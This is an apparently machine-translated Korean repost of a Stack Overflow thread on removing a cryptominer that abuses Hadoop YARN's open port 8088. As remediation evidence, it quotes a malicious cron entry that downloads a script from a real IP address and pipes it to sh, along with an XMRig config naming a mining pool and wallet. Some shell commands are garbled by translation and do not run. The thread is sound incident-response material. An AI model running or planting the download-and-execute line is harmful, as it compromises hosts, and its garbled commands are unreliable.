복붙노트

[HADOOP] YARN Dr.who 응용 프로그램 시도 시도 실패

HADOOP

YARN Dr.who 응용 프로그램 시도 시도 실패

hadoop 클러스터에서이 오류 메시지가 나타납니다. 누군가 왜 나에게 설명 할 수 있습니까? 어쨌든 더 많은 2000 작업 응용 프로그램이 만들어지고 실패합니다.

해결법

  1. ==============================

    1.이것은 해킹 일 수 있습니다 ... 이와 같은 수천 개의 일자리를 만드는 cryptocurrency 광부가 있습니다.

    이것은 해킹 일 수 있습니다 ... 이와 같은 수천 개의 일자리를 만드는 cryptocurrency 광부가 있습니다.

    의심스러운 각 노드에서 원사로 크론 작업을 확인하고 제거하십시오.

        $ sudo -u yarn crontab -e
    */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
    

    그런 다음 이와 같은 "java"프로세스를 확인하고 종료하십시오.

    /var/tmp/java -c /var/tmp/wc.conf
    

    다시 들어오는 것을 막으려면 들어오는 모든 포트를 클러스터에 고정해야합니다.

    자세한 내용은 이것을 참조하십시오. https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

  2. ==============================

    2.편집 : 여기 에이 문제를 해결하는 방법에 대한 작은 지침을 추가했습니다 .Google Cloud Dataproc Virus CrytalMiner (dr.who)

    편집 : 여기 에이 문제를 해결하는 방법에 대한 작은 지침을 추가했습니다 .Google Cloud Dataproc Virus CrytalMiner (dr.who)

    아마도 당신에게 무슨 일이 일어나고 있습니까?

    오류 로그에서 bitbucket / github 주소를 찾으십시오. 또한 get / wget / apt-get / curl 명령을 찾아 볼 수 있습니다.

    그가 부자 인 것 같아

    중요한 두 가지 :

    관련 :

  3. ==============================

    3.Google 클라우드에서 로봇은 8088 포트를 공격하고 많은 원사 응용 프로그램을 시작합니다. 1. Google 클라우드에서 방화벽 규칙을 추가하여 8088 액세스를 중지합니다. 2. 원사의 모든 응용 프로그램을 종료 원사 적용-목록 | grep 'dr.who'| awk '$ 6 == "ACCEPTED"{print $ 1}'| 앱을 읽는 동안; 원사 적용 -kill "$ app"; 끝난 3. 원사에 속하는 모든 프로세스를 종료합니다 (이전 단계는 CPU를 사용하지 않지만 네트워크는 나중에 중단됩니다) ps -ef | grep yarn | awk '{print $ 2}'| p를 읽는 동안; sudo kill -9 $ p를한다; 끝난

    Google 클라우드에서 로봇은 8088 포트를 공격하고 많은 원사 응용 프로그램을 시작합니다. 1. Google 클라우드에서 방화벽 규칙을 추가하여 8088 액세스를 중지합니다. 2. 원사의 모든 응용 프로그램을 종료 원사 적용-목록 | grep 'dr.who'| awk '$ 6 == "ACCEPTED"{print $ 1}'| 앱을 읽는 동안; 원사 적용 -kill "$ app"; 끝난 3. 원사에 속하는 모든 프로세스를 종료합니다 (이전 단계는 CPU를 사용하지 않지만 네트워크는 나중에 중단됩니다) ps -ef | grep yarn | awk '{print $ 2}'| p를 읽는 동안; sudo kill -9 $ p를한다; 끝난

    이제 원사를 따르기 위해 콘솔을 사용하십시오 ;-)

  4. ==============================

    4.마스터 및 슬레이브에 대한 보안 그룹을 편집하고 얀 응용 프로그램 및 해당 로그를 모니터링하는 데 사용하는 포트 8088에 대한 액세스를 제한해야합니다. 리소스 관리자는 또한 원사 응용 프로그램을 승인하고 나머지 API를 통해 실행되도록 허용합니다. RM의 REST API에 대한 자세한 내용을 보려면 여기를 클릭하십시오. 해커는이 포트를 사용하여 monero의 바이너리를 다운로드하고 "/ var / tmp / java"와 같은 위치에 셸 스크립트를 래핑하여 실을 실행하는 실 애플리케이션을 제출합니다. Yarn은 애플리케이션이라고 생각하지만 마이닝 소프트웨어를 출시 할 것입니다. 그러나 이것은 Java가 아닙니다. --version 명령 인수로 실행하면 결과가 아래에 표시됩니다

    마스터 및 슬레이브에 대한 보안 그룹을 편집하고 얀 응용 프로그램 및 해당 로그를 모니터링하는 데 사용하는 포트 8088에 대한 액세스를 제한해야합니다. 리소스 관리자는 또한 원사 응용 프로그램을 승인하고 나머지 API를 통해 실행되도록 허용합니다. RM의 REST API에 대한 자세한 내용을 보려면 여기를 클릭하십시오. 해커는이 포트를 사용하여 monero의 바이너리를 다운로드하고 "/ var / tmp / java"와 같은 위치에 셸 스크립트를 래핑하여 실을 실행하는 실 애플리케이션을 제출합니다. Yarn은 애플리케이션이라고 생각하지만 마이닝 소프트웨어를 출시 할 것입니다. 그러나 이것은 Java가 아닙니다. --version 명령 인수로 실행하면 결과가 아래에 표시됩니다

    [hadoop@ip-172-31-28-26 ~]$ /var/tmp/java --version
    XMRig 2.6.2
    built on Jun 24 2018 with GCC 6.3.0
    features: 64-bit AES
    

    또한 "/var/tmp/w.conf"파일을 찾으면 파일을 열면 그가 사용하는 monero wallet 서버, 지갑 주소 및 비밀번호 등을 볼 수 있습니다. 아래에서 내 emr 인스턴스에서 찾은 샘플을 참조하십시오

    {
    "algo": "cryptonight",
    "background": true,
    "donate-level": 1,
    "log-file": null,
    "print-time": 60,
    "max-cpu-usage": 95,
    "pools": [
         {
            "url": "stratum+tcp://163.172.205.136:3333",
            "user": "46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S",
            "pass": "h",
            "variant": -1
        }
    ],
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null
    }
    

    }

    요약하면 아래 단계에 따라이 문제를 해결하십시오.

    위의 단계를 수행하면 마이닝 프로그램이 다시 시작되지 않습니다.

  5. from https://stackoverflow.com/questions/50534973/yarn-dr-who-application-attempt-appattempt-fail by cc-by-sa and MIT license